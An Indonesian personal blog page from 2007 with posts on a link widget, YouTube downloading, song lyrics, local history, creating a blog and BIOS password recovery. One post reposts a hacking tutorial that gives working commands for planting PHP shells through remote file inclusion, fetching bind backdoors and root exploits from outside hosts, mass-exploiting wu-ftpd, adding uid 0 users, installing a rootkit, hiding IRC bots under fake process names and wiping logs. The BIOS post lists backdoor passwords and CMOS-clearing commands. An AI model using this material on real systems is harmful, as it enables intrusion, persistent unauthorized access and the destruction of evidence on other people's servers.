Dec 27, 2007

Buat Link Otomatis dalam BlOgmU

Thursday, December 27, 2007 Oleh dennis sistiawan ·
Labels:



Gak usah basa basi lagi deh, sebab aku gak bisa untuk basa-basi hehehehe, untuk membuat link otomatis teman-teman atau pengunjung blogmu
caranya gini buka linkme-up dan daftarkan dirimu disite tsb, dengan klik register, kok bengong tunggu apalagi langsung aja isikan semua
prefered user name : user name yang akan kamu pilih
password : isi sesukamu
repeat password : ulangi password yang barusan kamu tulis
email : isikan emailmu (yang betul) jikalau nanti kamu lupa password
blog url : isikan dengan blogmu
cawang I have read bla-bla
trus klik register
setelah itu login aja sesuai yang udah kamu isikan tadi, setelah login pilih linker HTML Code lalu copy pastekan codenya di blog ente........
dah selesai capek aku ngetik, udah ya tutornya...gampang kan




[+/-] Selengkapnya...

Tutorialku yang Hilang :(

Thursday, December 27, 2007 Oleh dennis sistiawan ·
Labels: , , ,

Terima kasih untuk semua yang pernah memposting ulang tutorku, sebab geocitiesku dah dibunuh oleh yahoo :( sedih banget
waaupun tutorku ini hanya sebatas tulisan kecil yang gak berguna dan tools-tools yang ada dibawah ini sudah tidak bisa dipakai sebab webku mate'

-*-------------------*-
-*- pasang backd00R -*-
-*-------------------*-
=====================
install shell php
=====================
###contohnya
http://livron.port5.com/mail.php <---------ini source shell misalnya: http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php -O log.php bila keluar pesan "permission denied" cari lah folder lain yang bisa untuk wget shell.php kita kalo bisa... buka: http://www.target.org/modules/My_eGallery/public/log.php ============== pasang bindtty ============== ###http://student.te.ugm.ac.id/~phoenix03/audit/bindedit.c gcc -o /var/tmp/bind /var/tmp/bind.c;/var/tmp/bind 4000 diatas kita menggunakan port 4000 sebagai binding port, sekarang cek apakah port 4000 terbuka, scan dengan phnxscan.c yang dibuat penulis, anda dapat mendownload source kodenya di http://student.te.ugm.ac.id/~phoenix03/tutorial/phnxscan.c. Kompile dan ekskusi script tadi menggunakan gcc dan scanlah port 4000 servet www.target.com. myshell~>gcc -o phnxscan phnxscan.c
myshell~> ping -c 2 target.com
PING target.com (210.189.77.28): 56 data bytes
64 bytes from 210.189.77.28: icmp_seq=0 ttl=38 time=428.044 ms
64 bytes from 210.189.77.28: icmp_seq=1 ttl=38 time=428.624 ms
--- target.com ping statistics ---
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 428.044/428.334/428.624/0.290 ms
myshell~> phnxscan -p 4000 -s 210.189.77.28
port 4000 (tcp) terbuka
Telnet server target port 4000, jika berhasil maka anda akan disuruh memasukkan
password yang default dari scriptnya changeme
myshell~> telnet 210.189.77.28 4000
Trying 210.189.77.28...
Connected to target.com (210.189.77.28).
Escape character is '^]'.
---------------------------------------------------
#### cd /var/tmp ; wget www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd
baru bikin file exekusi
chmod 755 /tmp/httpd
----------------------------------------------------
#### cd /var/tmp ; wget www.renjana.ws/~toa/bindtty
cd /var/tmp ; chmod 755 bindtty
cd /var/tmp ; ./bindtty
----------------------------------------------------
# test pake `uname -a` < kernel 2.4.20 ke bawah yg bisa wget http://roseofworld.org/shell.tar tar -zxvf shell.tar; cd webshell; ./1980 # klo uda buka putty > masukkan host > pilih telnet > isi port: 1980
# klo sukses maka akan masuk shell
### pake bind yg laen jika pengen shellnya ada passwd-nya
cd /var/tmp; wget geocities.com/pothei/nmap;chmod 755 nmap; ./nmap
# telnet ke host port 6665 passwd `stimik`
## cd /tmp; wget http://geocities.com/g4ptek/tools/bind.tgz
tar -zxvf bind.tgz;cd .bind; chmod 755 bindtty; ./dssl bindtty
telnet ke host port 6665 passwd `gagal`
## cd /var/tmp; wget http://geocities.com/g4ptek/tools/dns.php
# chmod 755 dns; ./dns
# telnet www.target.com 6029
-*-------------------*-
-*- belajar NgeRoot -*-
-*-------------------*-
### tahap ngeroot di shell yg tadi kita tembus
mkdir /tmp/temp.log
cd /tmp/temp.log
wget http://roseofworld.org/root.tar.gz
tar -zxvf root.tar.gz
cd root
./loginx 1970 1970
# jika tidak mendapat pesan error maka kmu sukses, pointer $ akan brubah menjadi #
# cek dengan `id` jika root jgn lupa bagi2 shellnya :p
### atau bisa ambil exploit di www.malanghack.net/alat/
mkdir /tmp/temp.log;cd /tmp/temp.log
wget http://www.malanghack.net/alat/w00t
chmod 755 w00t
./w00t
# jika ga muncul pesan error: you got root man!!
+----------------------------------------------------------------------------------------+
-*-----------------*-
-*- Cracking Root -*-
-*-----------------*-
Tips:
mkdir .bash <--- untuk membuat direktori bash cd .bash <--- untuk masuk ke direktori bash mkdir <--- untuk membuat direktory baru cd <--- untuk masuk ke direktory yg anda mau cd / <--- untuk keluar dari suatu direktory rm -rf <--- untuk menghapus file/direktory -*-----------------------------------------------*- 1. Tahap Pertama : Cara instalasi Xpost dan ftp wget http://cyberborneo.b0x.com/xpost.tgz wget http://cyberborneo.b0x.com/ftp.tgz tar -zxvf xpost.tgz tar -zxvf ftp.tgz -*------*- 2. Tahap Kedua cd xpost cd xwurm/ ./scan 213.124 setelah dapat wu-scan.log ./masswu wu-scan.log Setelah didapat pesan sebagai berikut Trying get root 213.124.151.113 ... SUCCESS, YOU HAVE ROOT IN 213.124.151.113 ... Logged in log-root ... Itu berarti anda telah dapat akses root di IP 213.124.151.113 -*------*- 3. Tahap Ketiga Buka new sessiom dari putty ssh anda, login kembali ke shell anda masuk ke direktory ftp anda cd ftp ./awu 213.124.151.113 ( ip nya) apabila anda sukses mendapat akses root nya maka akan keluar pesan sbb: 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) team teso (thx bnuts, tomas, synnergy.net !). # trying to log into 213.124.151.113 with (ftp/mozilla@) ... connected. # banner: 220 db-depot01 FTP server (Version wu-2.6.1-16) ready. # successfully selected target from banner ### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm] # 1. filling memory gaps # 2. sending bigbuf + fakechunk building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes # 3. triggering free(globlist[1]) # # exploitation succeeded. sending real shellcode # sending setreuid/chroot/execve shellcode # spawning shell ################################################################### uid=0(root) gid=0(root) groups=50(ftp) Linux db-depot01 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown whoami root <-- berarti anda sedang dalam akses root -*------*- 4. Tahap Keempat Add login akses root anda ---------------------------------------------------------------- 1. Cara I (bukan utk redhat 7.2) /usr/sbin/useradd rampok -u 0 -d / passwd -d rampok passwd rampok su rampok <<--------untuk super user 2. Cara II kalo mau dapet acces root ketik : /usr/sbin/useradd crit -u 0 g- 0 -d /etc/crit abis itu ketik lagi passwd crit wuasu666 Kemudian Add User untuk login shell anda /usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html passwd html fuck666 2X -*------*- 5. Tahap Kelima Pasang backdor ke shell baru anda guna menjaga kemungkinan yg tidak di inginkan wget www.utay-doyan.cc/shv4.tar.gz tar -zxvf shv4.tar.gz cd shv4 ./setup pass yang dimau port yang dimau contoh : --> ./setup wuasu 7000
cd /
wget http://cyberborneo.b0x.com/cleaner.tgz
tar -zxvf cleaner.tgz
cd cleaner
./install
Jangan lupa untuk menghapus file backdor anda tadi untuk menghapus jejak
rm -rf cleaner.tgz
rm -rf shv4.tar.gz
-*------*-
6. Tahap Keenam
Hapus jejak ngeroot anda ketik perintah berikut:
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /devory
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
ctrl d
SELESAI.....
---------------------------------------------------------------------------------
-*-----------------*-
-*- all IN one -*-
-*-----------------*-
Trik membuat PsyBnc, Menghapus file Log, membuat BACK DOOR , ..... <<>>
---------------------------------------------------------------------------------
-*------------------------------------------*-
-*- Langkah2 membuat PsyBnc Yang aman :P~ --*-
-*------------------------------------------*-
mkdir "...." <<-- ini dia direktori kita setelah itu kita masuk ke direktori tersebut cd "...." <<-- masuk ke direktori wget wget http://www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz mv psyBNC2.2.1-linux-i86-static.tar.gz .sh tar -zxvf .sh mv psybnc .log cd .log make echo "PSYBNC.SYSTEM.PORT1=110" >> user.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> user.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> user.conf
pwd
/home/scut/..../.log
ketik command:
PATH=$PATH:/home/scut/"...."/.log
mv psybnc "[identd] "
mv scut.conf " "
"[identd] " " "
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
O ,-' \ \/ / o \ ,--'
_/ _\ \ \ / o< \ __ _ ____/ __ ____ \_ \___ Version 2.2.1 (c) 1999-2000 the most psychoid and the cool lam3rz Group IRCnet `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-' Configuration File: No logfile specified, logging to log/psybnc.log Listening on: 0.0.0.0 port 11111 psyBNC2.2.1-cBtITLdDMSNp started (PID 2291) [scut@d11303 .log]$ ps -x untuk mengetahui proses di background shell [scut@d11303 .log]$ ps -x PID TTY STAT TIME COMMAND 31544 ? S 0:16 ./bash 31629 ? S 0:06 sendmail to scut 2212 pts/1 S 0:00 -bash 2291 pts/1 S 0:00 [identd] 2309 pts/1 R 0:00 ps -x catatan: 2291 pts/1 S 0:00 [identd] <<-- ini adalah background psybnc anda yang berubah setelah kita lakukan trik tersebut namun jangan keburu gembira dahulu, karena mungkin admin curiga dengan background yang ada di server tersebut dan admin akan mencarinya dengan: find grep psybnc <<-- kemungkinan yang dilakukan karena biasanya admin tahu kalau user selalu run psybnc maka akan nampak nama nama psybnc anda ./log/psybnc.log ./log/psybnc.log.old ./psybncchk ./psybnc.pid Untuk itu kita perlu mengganti nama nama tersebut dengan yang lain semisal [scut@d11303 .log]$ mv psybnc.pid .log [scut@d11303 log]$ mv psybnc.log .sh [scut@d11303 log]$ mv psybnc.log.old .mud Dengan cara tersebut kemungkinan sang admin nggak akan curiga terhadap background yang ada di server anda ;) dan yang terakhir jangan lupa bersihkan log anda dengan mengetik command: rm -f /.bash_history /root/.bash_history /var/log/messages ln -s /dev/null /.bash_history ln -s /dev/null /root/.bash_history touch /var/log/messages chmod 600 /var/log/messages Atau bisa juga menggunakan remove.c yang ada di situs k-elektronik :) selamat mencoba -*------------------------------------------*- -*- Langkah2 membuat PsyBnc II --*- -*------------------------------------------*- wget http://www.geocities.com/g4ptek/tools/psy.tar.gz tar -zxvf psy.tar.gz rm -rf psy.tar.gz cd .cgi; ./config 21221;-----------> port ubah sesuai keinginan
./fuck;./run
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
O ,-' \ \/ / o \ ,--'
_/ _\ \ \ / o< \ __ _ ____/ __ ____ \_ \___ Version 2.2.1 (c) 1999-2000 the most psychoid and the cool lam3rz Group IRCnet `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-' Configuration File:ssstt No logfile specified, logging to log/psybnc.log Listening on: 0.0.0.0 port 21221 psyBNC2.2.1-cBtITLdDMSNp started (PID 2291) # usage: # buka mirc, setting identd bebas, nick bebas ketik /server www.target.com 21221 -*------------------------------------------*- -*- Langkah2 membuat PsyBnc II Freebsd --*- -*------------------------------------------*- # wget http://www.geocities.com/g4ptek/tools/bnc.tar.gz # tar -zxvf bnc.tar.gz # rm -rf bnc.tar.gz # cd .ls # chmod 755 ls # ./ls -*-----------------------------------*- -*- Cara Mudah Untuk membuat BOT I -*- -*-----------------------------------*- NB: BOT Ini akan otomatis jalan pada server dalnet " Husus Untuk dalnet server " 1. wget brendanspaar.com/modules/coppermine/albums/kinabot.tar.gz atau brendanspaar.com/modules/coppermine/albums/kinabot.tar.bz2 <--untuk tambahan creat.tcl 2. tar -zvxf kinabot.tar.gz untuk kinabot.tar.gz tar -jxvf kinabot.tar.bz2 untuk kinabot.tar.bz2 3. cd .kin 4. ./creat fileconf nick ident IP channel owner contoh: ./creat defaced s4nd4l_j3p1t s4nd4l 212.88.174.3 defaced g4ptek defaced.................... file conf yg akan dibuat (akan terbuat dgn sendirinya) s4nd4l_j3p1t ...............nick bot s4nd4l ...................ident bot 212.88.174.3 .......IP shell mich\`keren
5. ./eggdrop -m fileconf
atau ./run fileconf fakename
fakename dapat dilihat dgn perintah ps x, cari aja proses yg paling banyak terlihat
contoh ./run a.txt /usr/local/apache/bin/httpd ( /usr/local/apache/bin/httpd = fake namenya)
Udah deh! tunggu aja di channel, ato whois aja nicknya.
Bila ingin tambahkan tcl lain seperti creat.tcl :
2. ./tcl -t fileconf creat.tcl
contoh: ./tcl -t a creat.tcl ( lihat keterangan dengan perintah ./tcl )
untuk penggunaan bisa diliat dengan command/perintah !creat dichannel
-*-----------------------------------*-
-*- Cara Mudah Untuk membuat BOT II -*-
-*-----------------------------------*-

wget http://geocities.com/g4ptek/tools/bot.tar.gz
tar -zxvf bot.tar.gz
rm -rf bot.tar.gz
cd .share
# download bot.txt ke kompi lalu edit settingnya sesuai kebutuhan, kemudian upload lagi
# contoh: http://verzekering.it/voorwaarden/.conf/scripts/bot4.txt
# klo mau nambah tcl masuk ke folder .share/scripts/ download semua tcl yg perlu dr http://verzekering.it/voorwaarden/.conf/scripts/ dan tambahkan kedalam folder .share/scripts/
# klo pengen tcl-nya jalan jgn lupa tambahkan ke file /.share/bot.txt (bagian paling bawah) terus upload lagi
./shade "httpd" ./eggdrop -m bot.txt
# usage:
# pv bot kamu di channel
# /msg nick-bot-kamu auth
# /msg nick-bot-kamu pass
# /msg nick-bot-kamu auth
Selamat BikiN Bot....
rewritten on barata jaya SBY, February 6th 2006 by g4ptek

thanks to
http://kampustembalang.web.id

[+/-] Selengkapnya...

Download Video di YouTube

Thursday, December 27, 2007 Oleh dennis sistiawan ·
Labels: , ,


Bagi anda penikmat video-video pasti udah tahu yang namanya youtube, yup tempat untuk maelihat dan share video-video kesukaan, bagi anda yang belum tahu cara mendownload video di youtube inilah salah satu cara untuk mendownloadnya

  1. Buka http://www.youtube.com kemudian pilih video yang diinginkan. Selanjutnya copy alamat URL nya misalnya http://youtube.com/watch?v=4cSRpu7bI04
  2. Kemudian buka http://www.mediapirate.org/ pastekan url tapi pilih grab setelah itu pilih download it, jangan lupa rename file tsb menjadi.flv
  3. Setelah selesai convert file tsb sesuai keinginan kamu!!! selamat mendownload video!!!

[+/-] Selengkapnya...

Dec 25, 2007

OST Cinderella - Cinta Yang Hilang

Tuesday, December 25, 2007 Oleh dennis sistiawan ·
Labels:

* hilang semua janji
semua mimpi-mimpi indah
hancur hati ini melihat semua ini
lenyap telah lenyap
kebahagiaan di hati
ku hanya bisa menangisi semua ini
hancur hati ini melihat kau telah pergi


** langit menjadi gelap berkelabu
menyelimuti hatiku
mengubah seluruh hidupku
mengapa semua jadi begini
perpisahan yang terjadi
di antara kita berdua
ku akan menanti sebuah keajaiban
yang membuat kita bisa bersama kembali

repeat *, **

[+/-] Selengkapnya...

Sejarah Situbondo

Tuesday, December 25, 2007 Oleh dennis sistiawan ·
Labels: ,

Asal Usul Nama Kabupaten Situbondo
Berdasarkan Legenda Pangeran Situbondo, nama Kabupaten Situbondo berasal dan narna Pangeran Situborido atau Pangeran Aryo Gajah Situbondo, dimana sepengetahuan masyarakat Situbondo bahwa Pangeran Situbondo tidak pernah menampakkan din, ha! tersebut dikarenakan keberadaannya di Kabupaten Situbondo kemungkinan sudah dalam keadaan meninggal-dunia akibat kekalahan pertarungannya dengan Joko Jumput, sehingga hanya ditandai dengan ditemukannya sebuah 'odheng' (ikat kepala).
Pangeran Situbondo yang ditemukan di wilayah Kelurahan Patokan dan sekarang dijadikan Ibukota Kabupaten Situbondo.Sedangkan menurut pemeo yang berkembang di masyarakat, arti kata SITUBONDO berasal dan kata : SITI = tanah dan BANDO = ikat , ha! tersebut dikaitkan dengan suatu keyakinan bahwa orang pendatang akan diikat untuk menetap di tanah Situbondo, kenjitaan mi mendekati kebenaran k banyak orang pendatang yang akhirnya menetap di Kabupaten Situbondo

Legenda Pangeran Situbondo
Pengeran Situbondo atau Pengeran Aryo Gajah Situbondo besaral dan Madura, pada suatu ketika dia ingin meminang Putni Adipati Suroboyo yang terkenal cantik, maka datanglah Pangeran Situbondo ke Surabaya untuk melamar Putri Adipati Suroboyo, naniun sayang keinginan Pangeran Situbondo sebenarnya ditolak oleh Adipati Suroboyo, akan tetapi penolakannya tidak secara terus-terang hanya diberi persyaratan untuk membábat hutan di sebelah Timur Surabaya, padahal persyaratan tersebut hanyalah suatu alasan yang maksudnya untuk mengulur-ulur waktu saja, sambil merencanakan siasat bagaimana caranya dapat menyingkirkan Pangeran Situbondo;Kesempatan Adipati Suroboyo menjalankan rencananya terbuka ketika
keponakannya yang bernama Joko Taruno dan Kediri, karena rupanya Joko Taruno juga bermaksud menyunting putrinya, dan Adipati Suroboyo tidak keberatan namun dengan syarat Joko Taruno harus mengalahkan Pangeran Situbondo tenlebih dahulu. Terdorong. kejnginannya untuk menyunting sang putri, maka berangkatlah Joko Taruno ke hutan untuk menantang Pangeran Situbondo, namun sayang Joko Taruno kalah dalam pertarungan tetapi kekalahannya tidak sampai terbunuh, sehingga Joko Taruno masih sempat mengadakan sayembara bahwa "barang siapa bisa mengalahkan Pangeran Situbondo akan mendapatkan hadiah separuh kekayaannya".

Mendengar sayembara tersebut datanglah Joko Jumput putra Mbok Rondo Prabankenco untuk mencobar maka ditantanglah Pangeran Situbondo oleh Joko Jumput, dan ternyata dalam ertarungan tersebut dimenangkan Joko Jumput, sedangkan Pangeran Situbondo tertendang jauh ke arah Timur hingga sampai di daerah Kabupaten Situbondo ditandai dengan ditemukannya sebuah 'odheng' (ikat kepala) Pangeran Situbondo, yang tepatnya ditemukan di wilayah Kelurahan Patokan yang sekanang menjadi Ibukota Kabupaten Situbondo.Selanjutnya kembali ke Surabaya dimana di hadapan Adipati Suroboyo kemenangan Joko Jumput atas Pangeran Situbondo diakui oleh Joko Taruno sebagai kemenangannya, narnun Adipati Suroboyo tidak begitu saja mempercayainya, maka untuk membuktikannya' disuruhlah keduanya bertarung untuk menentukan siapayang menjadi pemenang sesungguhnya.

Akhirnya pada saat pertarungan terjadi Joko Taruno tertimpa kutukan menjadi patung "Joko Dolog" akibat kebohongannya.Sejarah Kota SitubondoSejarah Kabupaten Situbondo tidak tenlepas dan sejarah Karesidenan Besuki, sehingga kita perlu mengkaji terlebih dahulu sejarah Karesidenan Besuki.Yang membabat Karesidenan Besuki pertama kali adalah Ki Pateh Abs (± th 1700) selanjutnya dipasrahkan kepada Tumenggung Joyo Lelono. Karena pada saat itu juga Belanda sudah menguasai Pulau Jawa (± th 1743) terutama di dáerah pesisir tennasuk pula Karesidenan Besuki dan dengan segala tipu-dayanya, maka pada akhirnya Tumenggung Joyo' Lebono tidak berdaya hingga Karesidenan Besuki dikuasai sepenuhnya oleh Belanda.Pada rnasanya (± th 1798) Pemerintahan Belanda pernah kekurangan keuangan untuk rnembiayai Pemerintahannya, sehingga Pulau Jawa pernah dikontrakkan kepada orang China, kemudian datanglah Raffles (± th 1811 - 1816) dan Inggris yang mengganti kekuasaan Belanda dan menebus Pulau Jawa, namun kekuasaan Inggris hanya bertahan beberapa tahun saja, selanjutnya Pulau Jawa di kuasai kembali oleh Belanda, dan diangkatlah Raden Noto Kusumo putra dan Pangeran Sumenep Madura yang bergelar Raden Tumenggung Prawirodiningrat I (± th 1820) sebagai Residen Pertama Karesidenan Besuki.

Dalam masa Pemerintahan Kacten I I banyak membantu I-'emenntaii Belanda dalam membangun Kabupaten Situbondo, antara-lain Pembangunan Dam Air Pmtu Lima di Desa Kotakan Situbondo, Setelah Raden Prawirodiningrat I meninggal dunia sebagai penggantinya adalah kaden Prawirodiningrat II' (± th 1830). Dalam masa Pemerintahan Raden Prawirodiningrat II banyak menghasilkan karya yang cukup menonjol antara-lain berdirinya Pabrik Gula di Kabupaten Situbondo, dimulai dan PG. Demaas, PG. Wringinanorn, PG. Panji, dan PG. Olean, maka atas jasanya tersebut Pemerintah Belanda memberikan hadiah berupa "Kalung Emas Bandul Singa".

Perlu diketahui pula pada masa Pemerintahan Raden Prawirodiningrat II wilayahnya hingga Kabupaten Probolinggo, terbukti salah seorang putranya yang bernama Raden Suringrono menj adi Bupati Probolinggo.Setelah Raden Prawirodiningrat II meninggal-dunia sebagai penggantinya adalah Raden Prawirodiningrat III (± th 1840). Tetapi dalam masa Pemerintahan Raden Prawirodiningrat III perkembangan Karesidenan Besuki kalah maju dibanding Kabupaten Situbondo, mungkin karena di Kabupaten Situbondo mempunyai beberapa pelabuhan yang cukup menunjang perkembangannya, yaitu antara-lain : Pelabuhan Panarukan, Kalbut dan Jangkar, sehingga pada akhimya pusat pemerintahan berpindah ke Kabupaten Situbondo dengan Raden Tumenggung Aryo Soeryo Dipoetro diangkat sebagai Bupati Pertama Kabupaten Situbondo, dan wilayah Karesidenan Besuki dibagi menjadi 2 yaitu: Besuki termasuk Suboh ke arah Barat hingga Banyuglugur ikut wilayah Kábupaten Bondowoso dan Miandingan ke arah Timur hingga Tapen ikut wilayah Kabupaten Situbondo, ha! mi terbukti dan logat bicara orang Besuki yang mirip dengan logat Bondowoso dan logat bicara orang Prajekan mirip dengan logat Situbondo.

PERUBAHAN NAMA KABUPATENPada mulanya nama Kabupaten Situbondo adalah "Kabupaten Panarukan" dengan Ibukota Situbondo, sehingga dahulu pada masa Pemerintahan Belanda oleh Gubernur Jenchal Daendels (± th 1808 - 1811) yang membangun jalan dengan kerja paksa sepanjang pantai utara Pulau Jawa dikenal dengan sehutan "Jalan Anyer - Panarukan" atau lebih dikenal lagi "Jalan Daendels", kemudian seiring waktu berjalan barulah pada masa Pemerintahan Bupati Achmad Tahir (± th 1972) diubah menjadi Kabupaten Situbondo dengan Ibukota Situbondo, berdasankan Peratunan Pemerintah RI Nomor. 28 / 1972 tentang Perubahan Nama dan Pemindahan Tempat Kedudukan Pemerintah Daeráh Perlu diketahui pula bahwa Kediaman Bupati Situbondo pada masa lalu belumlah berada di lingkungan Pendopo Kabupaten namun masih menempati rumah pribadinya, baru pada masa Pemerintahan Bupati Raden Aryo Poestoko Pranowo (± th 1900 - 1924), dia memperbaiki Pendopo Kabupaten sekaligus membangun Kediaman Bupati dan Paviliun Ajudan Bupati hingga sekarang mi, kemudian pada masa Pemerintahan Bupati Drs. H. Moh. Diaaman, Pemerintah Kabupaten Situbondo memperbaiki kembali Pendopo Kabupaten (± th 2002).
Terakhir kali diperbaharui ( Selasa, 13 Juni 2006 )


Sumber :http://situbondo.go.id

[+/-] Selengkapnya...

NgeBlog Yuk

Tuesday, December 25, 2007 Oleh dennis sistiawan ·
Labels: ,

Berikut ini adalah langkah-langkah Membuat blog menggunakan blogspot/blogger

LANGKAH PERTAMA
Setelah anda berhasil mengakses http://blogger.com, anda klik “Ciptakan Blog Anda Sekarang” Pada halaman berikutnya akan tampil sebuah form isian yang harus anda lengkapi, yaitu:

LANGKAH KEDUA
Alamat Email Isikan dengan alamat email google anda yang masih aktif (masih anda gunakan). Isikan kembali email tersebut pada isian kedua sebagai pengecekan ulang. Bila anda belum mempunyai email di google.com ataupun google.co.id, silahkan membuat email terlebih dahulu(gratis) sekarang google mail tanpa invite.Password Merupakan password yang anda inginkan untuk mengakses website anda nantinya. Isikan dengan password yang ingin anda gunakan (sebaiknya tidak sama dengan password untuk mengakses email anda). Isikan kembali password tersebut pada isian berikutnya sebagai pengecekan ulang.Nama TampilanMerupakan Nama Website Anda nantinya. Pilihlah Nama yang cocok dengan keinginan anda.Verifikasi KataVerifikasi kata merupakan isian rangkaian huruf atau angka yang ditampilkan secara acak oleh sistem. Isikan dengan rangkaian huruf atau angka sesuai urutan yang anda lihat.Tanda Cek Penerimaan PersyaratanTanda cek merupakan tanda penerimaan syarat dan ketentuan yang di berlakukan di website tersebut. Berilah tanda cek dengan meng-klik kotak kosong tersebut yang berarti anda menyetujui syarat dan ketentuan yang diberlakukan.Bila anda ingin mengetahui syarat-syarat tersebut, silahkan klik “Persyaratan dan Layanan” Anda telah selesai mengisi form isian tersebut. Klik tombol “Lanjutkan”

LANGKAH KETIGA
Judul Blog Merupakan Nama yang akan tampil di bagian atas(semacam papan nama) website anda. Isilah dengan Nama yang anda inginkanBlog Adress(URL)Merupakan Alamat URL yang nantinya menjadi link akses pengunjung ke website anda. Cukup isikan nama yang anda inginkan dan silahkan cek ketersediannya. Bila tidak tersedia, silahkan isi kembali dengan nama lain. Verifikasi Katamerupakan sarana sistem untuk memastikan pengisian bukan dilakukan oleh sistem otomasi tertentu. Isikan sesuai rangkaian huruf dan angka yang ditampilkan. Setup Tingkat LanjutMerupakan pilihan bilamana anda menginginkan website tersebut berada di hosting anda sendiri. Untuk membuat website standar, anda belum perlu melakukan Setup Tingkat LanjutAnda telah menyelesaian isian kedua. Selanjutnya silahkan klik "Lanjutkan"

LANGKAH KEEMPAT
Pilih Template Pada isian terakhir ini anda dipersilahkan memilih bentuk tampilan website anda sesuai pilihan yang tersedia.Dan Blog Terciptakan!. Anda telah bisa memulai posting tulisan di website kesayangan Anda.

Untuk Menghiasi atau mempercantik blog anda dengan tambahan widget-widget seperti mesin pencari, user online, hit counter, kalender dan lain sebagainya dapat mencarinya dan meletakkan pada blog anda sehingga tampilan blog anda lebih bagus, Selamat ngeBLOG!!!!

[+/-] Selengkapnya...

Ketika Lupa Password BIOS

Tuesday, December 25, 2007 Oleh dennis sistiawan ·
Labels: , ,

Terkadang kita lupa dengan password BIOS, sehingga ketika akan merubah konfigurasibios mengalami kesulitan. Biasanya untuk membuka password tersebut dilakukan dengancara merubah posisi jumper atau melepas baterai komputer, sebuah pekerjaan yang amatmerepotkan dan riskan.Untuk melepas jumper, kita memerlukan manual mother boardsedangkan melepas baterai CMOS, pada komputer tertentu terutama yang produk lamabiasanya baterainya disolder ke mother board. Bila tidak hati-hati dan salahmelakukannya mother board bisa rusak.

Berikut ini ada cara untuk mengatasi kerepotan-kerepotan tersebut :

  1. Standar BIOS backdoor password
    Dengan cara mengetikan password menurut nama pembuatnya (coba salah satu, dan perhatikan besar kecilnya huruf) sebagai berikut:
    AWARD BIOS : AWARD BIOS, AWARD SW, AWARD_SW, Award SW, AWARD PW, award, awkward, J64,j256, j262, j332, 01322222, 589589, 589721, 595595, 598598,HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPHA, aPAf,HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet
    AMI BIOS : AMI BIOSAMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND,Oder.
    Jika cara di atas gagal, password lain yang bisa dicoba (untuk AMI, AWARD atau BIOSlainnya) adalah:LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar,ALAFAROME, Syxz, Wodj2.
  2. Membuka BIOS lewat debug
    Bila cara yang di atas gagal, Anda bisa membuka password bios dengan menggunakan utility DEBUG dari MSDOS. Sebaiknya Anda mengerjakannya dalam mode MSDOS murni, bukan dari MSDOS shell dalam Windows.Setelah masuk dalam prompt debug, ketik perintah berikut:
    Untuk AMI/AWARD BIOS
    O 70 17O
    71 17
    Q
    Untuk PHOENIX BIOS
    O 70 FFO
    71 17
    Q
    GENERIK berlaku untuk semua mother board AT (board XT tidak punyaCMOS)
    O 70 2EO
    71 FF
    Q
    CATATAN: Karakter pertama adalah huruf O bukan angka 0.Setelah melakukan langkah di atas, reset komputer dan Anda bisa merubah konfigurasikomputer. Selamat bekerja.

Sumber : Dari berbagai sumber

[+/-] Selengkapnya...

Recent Post

follow me on twetter